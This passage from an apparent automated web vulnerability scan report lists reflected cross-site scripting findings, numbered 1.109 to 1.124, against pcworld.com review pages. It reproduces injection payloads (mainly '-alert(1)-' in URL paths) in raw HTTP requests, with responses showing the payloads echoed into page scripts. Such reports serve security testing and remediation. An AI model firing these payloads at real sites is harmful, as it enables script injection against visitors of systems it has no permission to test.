Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:19 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
'userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1657/top_10_allpurpose_laptops.html51789'-alert(1)-'9884d94cdac';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.109. http://www.pcworld.com/reviews/collection/1658/top_10_netbooks.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1658/top_10_netbooks.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1edca'-alert(1)-'9e9fad76bb9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1658/top_10_netbooks.html1edca'-alert(1)-'9e9fad76bb9 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=DF50206D4A072345DA5CBC072C92D6FF; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:33 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
eadCookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1658/top_10_netbooks.html1edca'-alert(1)-'9e9fad76bb9';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.110. http://www.pcworld.com/reviews/collection/1659/top_10_power_laptops.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1659/top_10_power_laptops.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db88c'-alert(1)-'5e66b828456 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1659/top_10_power_laptops.htmldb88c'-alert(1)-'5e66b828456 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=AA09B5F59EF2FD3EA098E5C7728B9CA0; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:59 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
okie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1659/top_10_power_laptops.htmldb88c'-alert(1)-'5e66b828456';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.111. http://www.pcworld.com/reviews/collection/1660/top_10_ultraportable_laptops.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1660/top_10_ultraportable_laptops.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aead0'-alert(1)-'f387ed030e7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1660/top_10_ultraportable_laptops.htmlaead0'-alert(1)-'f387ed030e7 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=42C016CAF8B90EC4BD7959589213E949; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 22:59:10 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1660/top_10_ultraportable_laptops.htmlaead0'-alert(1)-'f387ed030e7';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.112. http://www.pcworld.com/reviews/collection/1663/top_10_mp3_players_flashbased.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1663/top_10_mp3_players_flashbased.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 512b7'-alert(1)-'8bbbcb56674 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1663/top_10_mp3_players_flashbased.html512b7'-alert(1)-'8bbbcb56674 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=B11CC99631EC7BF23286B9E023207F5A; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:59 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
rEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1663/top_10_mp3_players_flashbased.html512b7'-alert(1)-'8bbbcb56674';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.113. http://www.pcworld.com/reviews/collection/1664/top_5_inkjet_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1664/top_5_inkjet_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bacae'-alert(1)-'35c7cc7406 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1664/top_5_inkjet_printers.htmlbacae'-alert(1)-'35c7cc7406 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:05 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
kie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1664/top_5_inkjet_printers.htmlbacae'-alert(1)-'35c7cc7406';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.114. http://www.pcworld.com/reviews/collection/1665/top_encrypted_portable_drives.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /reviews/collection/1665/top_encrypted_portable_drives.html

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0094"><a>316fa7c9b16 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /reviews/collection/1665/top_encrypted_portable_drives.htmld0094"><a>316fa7c9b16 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:47 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
=pcw.main.reviews/products/storage/hard_drives/chart;pg=chart;c=2111;c=2111;c=2112;c=2000;c=2100;pos=336showcase;tile=2;sz=336x280;
&amp;url=/reviews/collection/1665/top_encrypted_portable_drives.htmld0094"><a>316fa7c9b16"/>
...[SNIP]...

1.115. http://www.pcworld.com/reviews/collection/1665/top_encrypted_portable_drives.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1665/top_encrypted_portable_drives.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fb3e7'-alert(1)-'4ea4220835e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1665/top_encrypted_portable_drives.htmlfb3e7'-alert(1)-'4ea4220835e HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:04:54 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1665/top_encrypted_portable_drives.htmlfb3e7'-alert(1)-'4ea4220835e';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.116. http://www.pcworld.com/reviews/collection/1666/best_streaming_media_players.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1666/best_streaming_media_players.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 58ed0'-alert(1)-'457b518acc5 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1666/best_streaming_media_players.html58ed0'-alert(1)-'457b518acc5 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:06:10 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
erEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1666/best_streaming_media_players.html58ed0'-alert(1)-'457b518acc5';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.117. http://www.pcworld.com/reviews/collection/1668/top_bluetooth_car_kits.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1668/top_bluetooth_car_kits.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95bda'-alert(1)-'25ef1dd5626 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1668/top_bluetooth_car_kits.html95bda'-alert(1)-'25ef1dd5626 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=4F3E3E029C69ADD8A86556D0A29CB4C8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:49 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1668/top_bluetooth_car_kits.html95bda'-alert(1)-'25ef1dd5626';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.118. http://www.pcworld.com/reviews/collection/1669/webbased_photo_editors.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1669/webbased_photo_editors.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e2f9'-alert(1)-'db8203a9816 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1669/webbased_photo_editors.html2e2f9'-alert(1)-'db8203a9816 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:00:49 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1669/webbased_photo_editors.html2e2f9'-alert(1)-'db8203a9816';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.119. http://www.pcworld.com/reviews/collection/1670/top_10_bluetooth_headsets.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1670/top_10_bluetooth_headsets.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3c3ee'-alert(1)-'5ae5b4c7926 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1670/top_10_bluetooth_headsets.html3c3ee'-alert(1)-'5ae5b4c7926 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=EC0C60C5CE5E97639428C348F2336F9F; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:32 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
'userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1670/top_10_bluetooth_headsets.html3c3ee'-alert(1)-'5ae5b4c7926';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.120. http://www.pcworld.com/reviews/collection/1671/top_10_cell_phones.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1671/top_10_cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f7140'-alert(1)-'30943296398 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1671/top_10_cell_phones.htmlf7140'-alert(1)-'30943296398 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:39 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Cookie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1671/top_10_cell_phones.htmlf7140'-alert(1)-'30943296398';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.121. http://www.pcworld.com/reviews/collection/1672/top_10_unlocked_cell_phones.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1672/top_10_unlocked_cell_phones.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 77639'-alert(1)-'64dc6d34a6d was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1672/top_10_unlocked_cell_phones.html77639'-alert(1)-'64dc6d34a6d HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=40BFE5DD3C67795393B93AC536C42648; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:05:20 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
serEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1672/top_10_unlocked_cell_phones.html77639'-alert(1)-'64dc6d34a6d';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.122. http://www.pcworld.com/reviews/collection/1673/top_10_color_laser_multifunction_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1673/top_10_color_laser_multifunction_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1d52'-alert(1)-'400fcdc21c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1673/top_10_color_laser_multifunction_printers.htmld1d52'-alert(1)-'400fcdc21c HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=1FA8B335496A73A1CE83DC2153DEBF89; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:02:28 GMT
Connection: close
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmln
...[SNIP]...
Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1673/top_10_color_laser_multifunction_printers.htmld1d52'-alert(1)-'400fcdc21c';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri="
...[SNIP]...

1.123. http://www.pcworld.com/reviews/collection/1674/top_10_color_laser_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pcworld.com
Path:   /reviews/collection/1674/top_10_color_laser_printers.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d3e74'-alert(1)-'5847f5fba96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /reviews/collection/1674/top_10_color_laser_printers.htmld3e74'-alert(1)-'5847f5fba96 HTTP/1.1
Host: www.pcworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=6C4B6899BF1EDA7798568240E801B739;

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=8F454EFB69D02FF498ABE04AB54F15E8; Path=/
Content-Type: text/html;charset=UTF-8
Date: Mon, 15 Nov 2010 23:01:46 GMT
Connection: close
Vary: Accept-Encoding


                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
...[SNIP]...
ie('userEmail');
   Logon.isValid = '' != Logon.userEmail;

   /* Namespace RememberURI */
   var RememberURI = new Object();
   RememberURI.referer = '/reviews/collection/1674/top_10_color_laser_printers.htmld3e74'-alert(1)-'5847f5fba96';
   if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) {
       RememberURI.query = '';
       RememberURI.referer += RememberURI.query;
       document.cookie = "pcw.last_uri=" + e
...[SNIP]...

1.124. http://www.pcworld.com/reviews/collection/1674/top_10_color_laser_printers.html [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /reviews/collection/1674/top_10_color_laser_printers.html

Issue detail

